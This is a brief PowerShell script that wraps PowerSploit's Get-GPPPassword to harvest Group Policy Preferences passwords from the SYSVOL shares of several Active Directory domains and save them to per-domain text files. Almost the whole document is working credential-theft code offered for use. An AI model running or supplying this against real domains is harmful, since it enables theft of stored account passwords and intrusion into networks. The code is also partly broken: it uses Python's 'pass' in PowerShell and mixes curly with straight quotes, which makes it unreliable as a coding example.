Quick and dirty AD query script, in use for multi AD environments. This script utilizes Powersploit's GPPPassword tool (Chris Campbell, obscuresec) to run.

Get-GPPPassword_multi_domain.ps1

# Quick and dirty AD query script, in use for multi AD environments.
# This script utilizes Powersploit's GPPPassword tool (Chris Campbell, obscuresec) to run.
##############################################################################################################


$domains = ("Domain1”,”Domain2”)
Import-Module PATH_TO_FILE\Get-GPPPassword.ps1 

foreach ($domain in $domains){
    Write-Host "Testing SMB Connectivity to" $domain
    try{
        Test-NetConnection -ComputerName $domain -CommonTCPPort SMB -ErrorAction Stop -WarningAction Stop -InformationAction Continue
        Write-Host "Checking if SYSVOL is available.."
        if ((Test-Path \\$domain\SYSVOL) -eq $true){
            Write-Host "Now querying" $domain
            Get-GPPPassword -server $domain | Out-File PATH_TO_FILE\$domain.txt -Append -Encoding utf8
            }
        else {
            pass
            }
        }
    catch{
        pass
        }
}